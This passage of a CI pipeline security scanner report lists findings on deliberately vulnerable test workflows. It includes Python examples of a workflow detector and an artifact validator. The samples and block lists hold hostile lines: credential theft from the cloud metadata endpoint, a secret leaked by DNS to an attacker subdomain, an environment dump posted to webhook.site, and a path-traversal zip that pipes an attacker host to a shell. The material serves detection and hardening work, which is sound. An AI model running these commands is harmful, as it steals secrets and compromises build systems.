| ⚠️ HIGH | SCA-039 | Tunnel service detected: ngrok tunnel detected [network_exfiltration] | vulnerable-workflows/04-network-exfiltration.yml | Remove tunnel services from CI workflows. Use proper deployment pipelines instead. |
| ⚠️ HIGH | SCA-039 | Tunnel service detected: ngrok tunnel detected [network_exfiltration] | vulnerable-workflows/04-network-exfiltration.yml | Remove tunnel services from CI workflows. Use proper deployment pipelines instead. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: scan.aquasecurtiy.org [network_exfiltration] | vulnerable-workflows/19-teampcp-indicators.yml | Remove access to scan.aquasecurtiy.org. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: aquasecurtiy.org [network_exfiltration] | vulnerable-workflows/19-teampcp-indicators.yml | Remove access to aquasecurtiy.org. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io [network_exfiltration] | vulnerable-workflows/19-teampcp-indicators.yml | Remove access to tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: icp0.io [network_exfiltration] | vulnerable-workflows/19-teampcp-indicators.yml | Remove access to icp0.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: webhook.site [network_exfiltration] | vulnerable-workflows/15-behavioral-obfuscation.yml | Remove access to webhook.site. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: requestbin.net [network_exfiltration] | vulnerable-workflows/15-behavioral-obfuscation.yml | Remove access to requestbin.net. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-022 | Data exfiltration pattern: base64 data sent via curl [network_exfiltration] | vulnerable-workflows/15-behavioral-obfuscation.yml | Review this command. If legitimate, document why. Otherwise remove immediately. |
| ⚠️ HIGH | SCA-022 | Data exfiltration pattern: base64 data sent via curl [network_exfiltration] | vulnerable-workflows/16-gitlab-ci.yml | Review this command. If legitimate, document why. Otherwise remove immediately. |
| ⚠️ HIGH | SCA-022 | Data exfiltration pattern: curl POSTing secret data [network_exfiltration] | vulnerable-workflows/16-gitlab-ci.yml | Review this command. If legitimate, document why. Otherwise remove immediately. |
| ⚠️ HIGH | SCA-038 | DNS exfiltration: DNS lookup with variable (potential exfil) [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Review DNS-related commands. Restrict DNS resolution in CI if possible. |
| ⚠️ HIGH | SCA-038 | DNS exfiltration: nslookup with variable (potential exfil) [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Review DNS-related commands. Restrict DNS resolution in CI if possible. |
| ⚠️ HIGH | SCA-038 | DNS exfiltration: host command with variable (potential exfil) [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Review DNS-related commands. Restrict DNS resolution in CI if possible. |
| ⚠️ HIGH | SCA-038 | DNS exfiltration: DNS-over-HTTPS exfiltration [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Review DNS-related commands. Restrict DNS resolution in CI if possible; DNS-over-HTTPS bypasses resolver-level controls, so block the DoH endpoints at the egress layer as well. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: webhook.site [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to webhook.site. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: requestbin.com [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to requestbin.com. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: ngrok.io [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to ngrok.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: ngrok-free.app [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to ngrok-free.app. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: pipedream.net [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to pipedream.net. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Tunnel service detected: ngrok tunnel detected [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Remove tunnel services from CI workflows. Use proper deployment pipelines instead. |
| ⚠️ HIGH | SCA-039 | Tunnel service detected: ngrok tunnel detected [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Remove tunnel services from CI workflows. Use proper deployment pipelines instead. |
| ⚠️ HIGH | SCA-109 | Egress anomaly: curl to raw IP address [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Use StepSecurity Harden-Runner for network egress monitoring. Block outbound traffic to non-allowed endpoints. If this address is a legitimate endpoint, add it to the `egress_allowlist` in `.scg-config.yml`. |
| ⚠️ HIGH | SCA-109 | Egress anomaly: wget to raw IP address [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Use StepSecurity Harden-Runner for network egress monitoring. Block outbound traffic to non-allowed endpoints. If this address is a legitimate endpoint, add it to the `egress_allowlist` in `.scg-config.yml`. |
| ⚠️ HIGH | SCA-109 | Egress anomaly: curl to raw IP address [network_exfiltration] | vulnerable-workflows/34-network-egress-anomaly.yml | Use StepSecurity Harden-Runner for network egress monitoring. Block outbound traffic to non-allowed endpoints. If this address is a legitimate endpoint, add it to the `egress_allowlist` in `.scg-config.yml`. |
| ⚠️ HIGH | SCA-039 | Tunnel service detected: ngrok tunnel detected [network_exfiltration] | vulnerable-workflows/18-scg-config.yml | Remove tunnel services from CI workflows. Use proper deployment pipelines instead. |
| ⚠️ HIGH | SCA-039 | Tunnel service detected: ngrok tunnel detected [network_exfiltration] | vulnerable-workflows/18-scg-config.yml | Remove tunnel services from CI workflows. Use proper deployment pipelines instead. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: polyfill.io [network_exfiltration] | vulnerable-workflows/22-polyfill-cdn-attack.yml | Remove access to polyfill.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: polyfill.io [network_exfiltration] | vulnerable-workflows/22-polyfill-cdn-attack.yml | Remove access to polyfill.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: polyfill.io [network_exfiltration] | vulnerable-workflows/22-polyfill-cdn-attack.yml | Remove access to polyfill.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: cdn.polyfill.io [network_exfiltration] | vulnerable-workflows/22-polyfill-cdn-attack.yml | Remove access to cdn.polyfill.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-039 | Suspicious domain access: polyfill.io [network_exfiltration] | vulnerable-workflows/22-polyfill-cdn-attack.yml | Remove access to polyfill.io. Review whether this was intentionally added or injected. |
| ⚠️ HIGH | SCA-062 | OIDC token accessed in run block [oidc_audit] | vulnerable-workflows/10-oidc-abuse.yml | Use official cloud auth actions (`aws-actions/configure-aws-credentials`, `google-github-actions/auth`) instead of manual OIDC token handling. |
| ⚠️ HIGH | SCA-062 | OIDC token accessed in run block [oidc_audit] | vulnerable-workflows/27-oidc-token-abuse.yml | Use official cloud auth actions (`aws-actions/configure-aws-credentials`, `google-github-actions/auth`) instead of manual OIDC token handling. |
| ⚠️ HIGH | SCA-062 | OIDC token accessed in run block [oidc_audit] | vulnerable-workflows/27-oidc-token-abuse.yml | Use official cloud auth actions (`aws-actions/configure-aws-credentials`, `google-github-actions/auth`) instead of manual OIDC token handling. |
| ⚠️ HIGH | SCA-069 | Untrusted artifact consumption in workflow_run context [artifact_integrity] | vulnerable-workflows/28-artifact-attacks.yml | Validate artifact contents before use. Never execute downloaded artifacts directly. Verify the triggering workflow's conclusion and `head_sha` before consuming its artifacts. |
| ⚠️ HIGH | SCA-074 | Unpinned container image in 'build-container': docker:latest [container_security] | vulnerable-workflows/26-container-attacks.yml | Pin container images to SHA-256 digests: `image@sha256:<digest>`. |
| ⚠️ HIGH | SCA-079 | Insecure Docker registry configuration [container_security] | vulnerable-workflows/26-container-attacks.yml | Always use TLS for registry communication. Remove `--insecure-registry` flags. |
| ⚠️ HIGH | SCA-080 | Unpinned Dockerfile base image: node:latest [container_security] | vulnerable-workflows/26-Dockerfile | Pin to an explicit version and digest: `node:<version>@sha256:<digest>`. |
| ⚠️ HIGH | SCA-081 | Remote URL in Dockerfile ADD instruction [container_security] | vulnerable-workflows/26-Dockerfile | Use `COPY` with pre-downloaded and verified files. Verify checksums after download. |
| ⚠️ HIGH | SCA-081 | Remote URL in Dockerfile ADD instruction [container_security] | vulnerable-workflows/26-Dockerfile | Use `COPY` with pre-downloaded and verified files. Verify checksums after download. |
| ⚠️ HIGH | SCA-BHV-FLOW | Deferred / background execution [behavioral_analysis] | vulnerable-workflows/14-runtime-cryptominer.yml | Add `timeout-minutes` to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| ⚠️ HIGH | SCA-BHV-PERS | SSH key manipulation [behavioral_analysis] | vulnerable-workflows/14-runtime-cryptominer.yml | Use ephemeral (GitHub-hosted) runners. If self-hosted runners are required, use ephemeral mode and rebuild after every job. Never persist state between workflow runs. |
| ⚠️ HIGH | SCA-BHV-CRED | Accessing GitHub Actions runtime token internals [behavioral_analysis] | vulnerable-workflows/10-oidc-abuse.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| ⚠️ HIGH | SCA-BHV-FLOW | Unsanitised write to GITHUB_ENV [behavioral_analysis] | vulnerable-workflows/10-oidc-abuse.yml | Use heredoc delimiter syntax for multi-line values. Sanitise all values before writing to `GITHUB_ENV`. |
| ⚠️ HIGH | SCA-BHV-DYN | Network fetch + code execution in job 'build-checks' [behavioral_analysis] | vulnerable-workflows/37-build-system-compromise.yml | Pin downloads to checksums. Avoid piping network output directly to execution. |
| ⚠️ HIGH | SCA-BHV-PERM | write-all permissions at workflow level [behavioral_analysis] | vulnerable-workflows/35-dispatch-codeowners.yml | Apply least privilege: grant only the specific permissions each job needs (e.g. `contents: read`, `issues: write`). |
| ⚠️ HIGH | SCA-BHV-DYN | Privileged Docker container execution [behavioral_analysis] | vulnerable-workflows/09-container-escape.yml | Apply least privilege to containers. Never use `--privileged`, and never mount the host root filesystem or the Docker socket into a CI container. |
| ⚠️ HIGH | SCA-BHV-PERM | write-all permissions at workflow level [behavioral_analysis] | vulnerable-workflows/19-teampcp-indicators.yml | Apply least privilege: grant only the specific permissions each job needs (e.g. `contents: read`, `issues: write`). |
| ⚠️ HIGH | SCA-BHV-PERM | write-all permissions at workflow level [behavioral_analysis] | vulnerable-workflows/25-reusable-workflow-attacks.yml | Apply least privilege: grant only the specific permissions each job needs (e.g. `contents: read`, `issues: write`). |
| ⚠️ HIGH | SCA-BHV-CRED | Accessing GitHub Actions runtime token internals [behavioral_analysis] | vulnerable-workflows/27-oidc-token-abuse.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| ⚠️ HIGH | SCA-BHV-CRED | Accessing GitHub Actions runtime token internals [behavioral_analysis] | vulnerable-workflows/27-oidc-token-abuse.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| ⚠️ HIGH | SCA-BHV-PERM | write-all permissions at workflow level [behavioral_analysis] | vulnerable-workflows/23-self-hosted-runner.yml | Apply least privilege: grant only the specific permissions each job needs (e.g. `contents: read`, `issues: write`). |
| ⚠️ HIGH | SCA-BHV-DYN | pip install from URL [behavioral_analysis] | vulnerable-workflows/29-dependency-confusion.yml | Install from a trusted index with pinned versions and hashes (`pip install --require-hashes -r requirements.txt`) instead of from a URL. Never pipe downloaded content to a shell. |
| ⚠️ HIGH | SCA-BHV-DYN | pip install from URL [behavioral_analysis] | vulnerable-workflows/29-dependency-confusion.yml | Install from a trusted index with pinned versions and hashes (`pip install --require-hashes -r requirements.txt`) instead of from a URL. Never pipe downloaded content to a shell. |
| ⚠️ HIGH | SCA-BHV-DYN | pip install from URL [behavioral_analysis] | vulnerable-workflows/29-dependency-confusion.yml | Install from a trusted index with pinned versions and hashes (`pip install --require-hashes -r requirements.txt`) instead of from a URL. Never pipe downloaded content to a shell. |
| ⚠️ HIGH | SCA-BHV-DYN | Network fetch + code execution in job 'deploy' [behavioral_analysis] | vulnerable-workflows/11-artifact-poisoning.yml | Pin downloads to checksums. Avoid piping network output directly to execution. |
| ⚠️ HIGH | SCA-BHV-DYN | Network fetch + code execution in job 'test' [behavioral_analysis] | vulnerable-workflows/15-behavioral-obfuscation.yml | Pin downloads to checksums. Avoid piping network output directly to execution. |
| ⚠️ HIGH | SCA-BHV-DYN | Network fetch + code execution in job 'test' [behavioral_analysis] | vulnerable-workflows/15-behavioral-obfuscation.yml | Pin downloads to checksums. Avoid piping network output directly to execution. |
| ⚠️ HIGH | SCA-BHV-DYN | Network fetch + code execution in job 'setup' [behavioral_analysis] | vulnerable-workflows/13-binary-dropper.yml | Pin downloads to checksums. Avoid piping network output directly to execution. |
| ⚠️ HIGH | SCA-BHV-DYN | Network fetch + code execution in job 'setup' [behavioral_analysis] | vulnerable-workflows/13-binary-dropper.yml | Pin downloads to checksums. Avoid piping network output directly to execution. |
| ⚠️ HIGH | SCA-BHV-PERM | write-all permissions at workflow level [behavioral_analysis] | vulnerable-workflows/24-output-injection.yml | Apply least privilege: grant only the specific permissions each job needs (e.g. `contents: read`, `issues: write`). |
| ⚠️ HIGH | SCA-BHV-DYN | Privileged Docker container execution [behavioral_analysis] | vulnerable-workflows/16-gitlab-ci.yml | Apply least privilege to containers. Never use `--privileged`, and never mount the host root filesystem or the Docker socket into a CI container. |
| ⚠️ HIGH | SCA-BHV-PERM | write-all permissions at workflow level [behavioral_analysis] | vulnerable-workflows/28-artifact-attacks.yml | Apply least privilege: grant only the specific permissions each job needs (e.g. `contents: read`, `issues: write`). |
| ⚠️ HIGH | SCA-BHV-PERM | write-all permissions at workflow level [behavioral_analysis] | vulnerable-workflows/06-permission-escalation.yml | Apply least privilege: grant only the specific permissions each job needs (e.g. `contents: read`, `issues: write`). |
| ⚠️ HIGH | SCA-106 | [GITLAB] Secret variable in echo [cross_platform_ci] | vulnerable-workflows/16-gitlab-ci.yml | Remove the echo of the secret variable. Log masking is best-effort and is defeated by encoding, splitting or otherwise transforming the value, so treat any secret that reached the job log as exposed and rotate it. |
| ⚠️ HIGH | SCA-106 | [GITLAB] Secret variable in echo [cross_platform_ci] | vulnerable-workflows/16-gitlab-ci.yml | Remove the echo of the secret variable. Log masking is best-effort and is defeated by encoding, splitting or otherwise transforming the value, so treat any secret that reached the job log as exposed and rotate it. |
| ⚠️ HIGH | SCA-106 | [GITLAB] Secret variable in echo [cross_platform_ci] | vulnerable-workflows/16-gitlab-ci.yml | Remove the echo of the secret variable. Log masking is best-effort and is defeated by encoding, splitting or otherwise transforming the value, so treat any secret that reached the job log as exposed and rotate it. |
| ⚠️ HIGH | SCA-107 | [CIRCLECI] Secret variable in echo [cross_platform_ci] | vulnerable-workflows/31-circleci-config.yml | Remove the echo of the secret variable. Log masking is best-effort and is defeated by encoding, splitting or otherwise transforming the value, so treat any secret that reached the job log as exposed and rotate it. |
| ⚠️ HIGH | SCA-107 | [CIRCLECI] Secret variable in echo [cross_platform_ci] | vulnerable-workflows/31-circleci-config.yml | Remove the echo of the secret variable. Log masking is best-effort and is defeated by encoding, splitting or otherwise transforming the value, so treat any secret that reached the job log as exposed and rotate it. |
| ⚠️ HIGH | SCA-107 | [CIRCLECI] Secret variable in echo [cross_platform_ci] | vulnerable-workflows/31-circleci-config.yml | Remove the echo of the secret variable. Log masking is best-effort and is defeated by encoding, splitting or otherwise transforming the value, so treat any secret that reached the job log as exposed and rotate it. |
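
Most of the HIGH findings above come from a handful of textual rule families applied to `run:` and `uses:` lines: curl or wget to a raw IP (SCA-109), DNS lookups whose query carries variable data (SCA-038), known exfiltration and tunnel domains (SCA-039), base64 output piped into curl (SCA-022), mutable action refs such as `@master` (SCA-098) and over-broad `permissions` (SCA-BHV-PERM, SCA-034). The block below is an added example, not the scanner's own code, showing how such a pass is built from the standard library alone and what it catches on a constructed vulnerable workflow versus a constructed hardened one. The indicator set is taken from the domains named in this report; the `.attacker.example` hostname, the placeholder 40-hex commit and every sample step command are constructed for the example.

```python
"""Line-oriented static pass over a workflow for the rule families in this
report: raw-IP egress (SCA-109), DNS lookups carrying variable data (SCA-038),
known exfil/tunnel domains (SCA-039), base64 piped into curl (SCA-022),
mutable action refs (SCA-098) and over-broad permissions (SCA-BHV-PERM,
SCA-034). Stdlib only, so no YAML parser: it scans line by line."""
import re

# Constructed from the domains named in this report; extend from your own
# indicator feed. Subdomains match too (cdn.polyfill.io -> polyfill.io).
SUSPICIOUS_DOMAINS = {
    "webhook.site", "requestbin.com", "requestbin.net", "pipedream.net",
    "ngrok.io", "ngrok-free.app", "polyfill.io", "icp0.io",
}
IMDS_IP = "169.254.169.254"  # cloud metadata endpoint on AWS, Azure and GCP

RAW_IP_URL = re.compile(r"\b(?:curl|wget)\b[^|;&\n]*?https?://(\d{1,3}(?:\.\d{1,3}){3})")
DNS_WITH_VAR = re.compile(r"\b(?:nslookup|dig|host)\b[^\n]*\$[{(]?[A-Za-z_]")
B64_TO_CURL = re.compile(r"\bbase64\b[^\n]*\|[^\n]*\bcurl\b|\bcurl\b[^\n]*\$\([^\n]*\bbase64\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})")
USES_REF = re.compile(r"^\s*-?\s*uses:\s*([^@\s]+)@(\S+)")
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")


def suspicious_domain(host):
    """Return the matching indicator for host, or None."""
    host = host.lower()
    for indicator in SUSPICIOUS_DOMAINS:
        if host == indicator or host.endswith("." + indicator):
            return indicator
    return None


def scan_workflow(text):
    """Return (rule_id, line_no, detail) tuples; line 0 means file-level."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = RAW_IP_URL.search(line)
        if m:
            what = "cloud metadata endpoint" if m.group(1) == IMDS_IP else "raw IP address"
            findings.append(("SCA-109", n, f"egress to {what} {m.group(1)}"))
        if DNS_WITH_VAR.search(line):
            findings.append(("SCA-038", n, "DNS lookup built from variable data"))
        for host in URL_HOST.findall(line):
            if suspicious_domain(host):
                findings.append(("SCA-039", n, f"suspicious domain {host}"))
        if B64_TO_CURL.search(line):
            findings.append(("SCA-022", n, "base64-encoded data sent via curl"))
        m = USES_REF.match(line)
        if m and not FULL_SHA.match(m.group(2)):
            findings.append(("SCA-098", n, f"mutable ref {m.group(1)}@{m.group(2)}"))
    # Top-level key only: job-level permissions are indented.
    if re.search(r"^permissions:[ \t]*write-all[ \t]*$", text, re.M):
        findings.append(("SCA-BHV-PERM", 0, "write-all permissions at workflow level"))
    elif not re.search(r"^permissions:", text, re.M):
        findings.append(("SCA-034", 0, "no top-level permissions block"))
    return findings


def count_by_rule(findings):
    """Collapse findings to {rule_id: count} for a quick summary."""
    counts = {}
    for rule, _, _ in findings:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


# Constructed sample workflows (not files from the scanned repository).
VULNERABLE = """\
name: ci
on: [push]
permissions: write-all
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: aquasecurity/trivy-action@master
      - run: curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
      - run: nslookup "$(echo "$AWS_SECRET_ACCESS_KEY" | head -c 60).dns.attacker.example"
      - run: curl -X POST https://webhook.site/constructed-id -d "$(env | base64 -w0)"
      - run: curl -fsSL https://cdn.polyfill.io/v3/polyfill.min.js -o polyfill.js
"""

HARDENED = """\
name: ci
on: [push]
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      # placeholder 40-hex commit, not a real upstream SHA; pin to the audited commit
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - run: curl -fsSL https://registry.npmjs.org/ -o /dev/null
"""

if __name__ == "__main__":
    for rule, line, detail in scan_workflow(VULNERABLE):
        print(f"{rule:12} line {line:2}  {detail}")
    print("hardened:", scan_workflow(HARDENED))  # []
```

The domain match is suffix-based so that `cdn.polyfill.io` is caught by the `polyfill.io` indicator, and the raw-IP rule singles out `169.254.169.254` because a request there from CI is almost always credential theft via the metadata service rather than a typo. The `permissions` check is deliberately file-level: a missing top-level block and a `write-all` block are both reported, matching the SCA-034 and SCA-BHV-PERM rows in this report.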
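
The SCA-069 and SCA-068 rows above tell a privileged `workflow_run` job to check the triggering run's conclusion and `head_sha`, verify the downloaded artifact's digest and validate its contents before use. As an added example (not the scanner's or any project's code), the block below implements those checks together with an archive-path check, since a poisoned artifact is usually a zip whose member names try to escape the extraction directory. The event payload, repository names, commit, digest and archive contents are all constructed; the field names follow the GitHub `workflow_run` webhook payload.

```python
"""Checks for a privileged job that consumes artifacts from a workflow_run
trigger (SCA-068 / SCA-069 above): the triggering run concluded successfully,
its head_sha is the commit we intend to act on, pull-request builds yield
data rather than code, the blob matches the digest the build job recorded,
and the archive cannot escape its extraction directory. Stdlib only."""
import hashlib
import hmac
import io
import posixpath
import zipfile


class ArtifactRejected(Exception):
    """Raised when an artifact must not be consumed."""


def check_triggering_run(event, expected_sha, own_repo):
    """Return "trusted" when the artifact may be executed (built by a non-PR
    event from our own repository), "data-only" when it must be treated as
    untrusted input, and raise ArtifactRejected otherwise.
    Field names follow the GitHub workflow_run webhook payload."""
    run = event["workflow_run"]
    if run.get("conclusion") != "success":
        raise ArtifactRejected(f"triggering run concluded {run.get('conclusion')!r}")
    # head_sha must be the commit this job was asked to act on (e.g. the PR head
    # fetched via the API); otherwise a later push can swap the artifact under us.
    if not hmac.compare_digest(run.get("head_sha", ""), expected_sha):
        raise ArtifactRejected("head_sha of triggering run does not match expected commit")
    if run.get("event") == "pull_request" or run["head_repository"]["full_name"] != own_repo:
        return "data-only"
    return "trusted"


def verify_digest(blob, expected_hex):
    """Compare the download with the SHA-256 the build job published."""
    actual = hashlib.sha256(blob).hexdigest()
    if not hmac.compare_digest(actual, expected_hex.lower()):
        raise ArtifactRejected("artifact digest mismatch")
    return actual


def safe_member_names(zip_bytes):
    """Return member names, rejecting absolute paths and '..' components.
    zipfile.extract strips these silently; in CI we want to fail loudly."""
    names = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            parts = posixpath.normpath(name).split("/")
            if posixpath.isabs(name) or name.startswith("\\") or ".." in parts:
                raise ArtifactRejected(f"unsafe member path {name!r}")
            names.append(name)
    return names


def rejects(fn, *args):
    """True if fn(*args) raises ArtifactRejected (helper for self-checks)."""
    try:
        fn(*args)
    except ArtifactRejected:
        return True
    return False


def build_zip(entries):
    """Constructed in-memory archive from {member name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample inputs (not real repositories, commits or artifacts).
OWN_REPO = "example-org/app"
REVIEWED_SHA = "a" * 40
PUSH_EVENT = {"workflow_run": {"event": "push", "conclusion": "success",
              "head_sha": REVIEWED_SHA, "head_repository": {"full_name": OWN_REPO}}}
FORK_PR_EVENT = {"workflow_run": {"event": "pull_request", "conclusion": "success",
                 "head_sha": REVIEWED_SHA, "head_repository": {"full_name": "attacker/app"}}}
FAILED_EVENT = {"workflow_run": {"event": "push", "conclusion": "failure",
                "head_sha": REVIEWED_SHA, "head_repository": {"full_name": OWN_REPO}}}
GOOD_ARTIFACT = build_zip({"report.json": b'{"ok": true}'})
GOOD_DIGEST = hashlib.sha256(GOOD_ARTIFACT).hexdigest()
EVIL_ARTIFACT = build_zip({"../../.bashrc": b"curl attacker.example | sh"})

if __name__ == "__main__":
    print(check_triggering_run(PUSH_EVENT, REVIEWED_SHA, OWN_REPO))     # trusted
    print(check_triggering_run(FORK_PR_EVENT, REVIEWED_SHA, OWN_REPO))  # data-only
    print(rejects(check_triggering_run, FAILED_EVENT, REVIEWED_SHA, OWN_REPO))  # True
    print(safe_member_names(GOOD_ARTIFACT), rejects(safe_member_names, EVIL_ARTIFACT))
```

The split between "trusted" and "data-only" is the point of the SCA-069 row: an artifact built from a pull request ran attacker-controlled code, so even a successful, same-commit build may only be parsed, never executed or deployed. The digest comparison assumes the build job published the SHA-256 through a channel the consumer trusts (a job output or a separately attested file), not inside the same artifact.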
| Severity | Rule ID | Finding | Location | Remediation |
|---|---|---|---|---|
| 🔶 MEDIUM | SCA-055 | Dangerous command: Base64 decoding (potential obfuscation) [workflow_analysis] | vulnerable-workflows/10-oidc-abuse.yml | Remove the obfuscated command; CI logic should be human-readable. If encoded data must be decoded, verify its integrity with a checksum first and never pipe the decoded output into a shell interpreter. |
| 🔶 MEDIUM | SCA-024 | Mutable container image: docker:latest [workflow_analysis] | vulnerable-workflows/26-container-attacks.yml | Pin container images to SHA digests: `image@sha256:...`. |
| 🔶 MEDIUM | SCA-055 | Dangerous command: Base64 decoding (potential obfuscation) [workflow_analysis] | vulnerable-workflows/15-behavioral-obfuscation.yml | Remove the obfuscated command; CI logic should be human-readable. If encoded data must be decoded, verify its integrity with a checksum first and never pipe the decoded output into a shell interpreter. |
| 🔶 MEDIUM | SCA-040 | Cache poisoning risk in job 'build' [cache_poisoning] | vulnerable-workflows/05-cache-poisoning.yml | 1. Include lockfile hashes in cache keys: `hashFiles('**/package-lock.json')`. 2. Do not use `restore-keys` with broad prefixes. 3. Never use `actions/cache` with `pull_request_target`. 4. Verify cache integrity. |
| 🔶 MEDIUM | SCA-040 | Cache poisoning risk in job 'build' [cache_poisoning] | vulnerable-workflows/05-cache-poisoning.yml | 1. Include lockfile hashes in cache keys: `hashFiles('**/package-lock.json')`. 2. Do not use `restore-keys` with broad prefixes. 3. Never use `actions/cache` with `pull_request_target`. 4. Verify cache integrity. |
| 🔶 MEDIUM | SCA-085 | Reusable workflow from external organization: org-name [reusable_workflow] | vulnerable-workflows/25-reusable-workflow-attacks.yml | Audit the external workflow at org-name/shared-workflows. If possible, fork and maintain your own copy. Pin to a SHA. |
| 🔶 MEDIUM | SCA-085 | Reusable workflow from external organization: external-security-org [reusable_workflow] | vulnerable-workflows/25-reusable-workflow-attacks.yml | Audit the external workflow at external-security-org/scanners. If possible, fork and maintain your own copy. Pin to a SHA. |
| 🔶 MEDIUM | SCA-085 | Reusable workflow from external organization: org-name [reusable_workflow] | vulnerable-workflows/25-reusable-workflow-attacks.yml | Audit the external workflow at org-name/shared-workflows. If possible, fork and maintain your own copy. Pin to a SHA. |
| 🔶 MEDIUM | SCA-087 | Excessive secrets passed to reusable workflow in 'build-and-publish' [reusable_workflow] | vulnerable-workflows/25-reusable-workflow-attacks.yml | Minimise secrets passed to external workflows. Use OIDC for cloud auth instead of long-lived secrets. |
| 🔶 MEDIUM | SCA-085 | Reusable workflow from external organization: org-name [reusable_workflow] | vulnerable-workflows/25-reusable-workflow-attacks.yml | Audit the external workflow at org-name/shared-workflows. If possible, fork and maintain your own copy. Pin to a SHA. |
| 🔶 MEDIUM | SCA-085 | Reusable workflow from external organization: random-external-org [reusable_workflow] | vulnerable-workflows/12-reusable-workflow-trust.yml | Audit the external workflow at random-external-org/shared-workflows. If possible, fork and maintain your own copy. Pin to a SHA. |
| 🔶 MEDIUM | SCA-085 | Reusable workflow from external organization: another-org [reusable_workflow] | vulnerable-workflows/12-reusable-workflow-trust.yml | Audit the external workflow at another-org/deploy-workflows. If possible, fork and maintain your own copy. Pin to a SHA. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/20-cloud-metadata-imds.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/14-runtime-cryptominer.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/26-container-attacks.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/17-egress-exfiltration.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/37-build-system-compromise.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/04-network-exfiltration.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
| 🔶 MEDIUM | SCA-034 | Missing permissions block: GITHUB_TOKEN falls back to the repository default, which may be read-write [permission_audit] | vulnerable-workflows/09-container-escape.yml | Add a top-level `permissions` block with only the minimum required scopes, e.g. `permissions: { contents: read }`, and add other scopes per job as needed. |
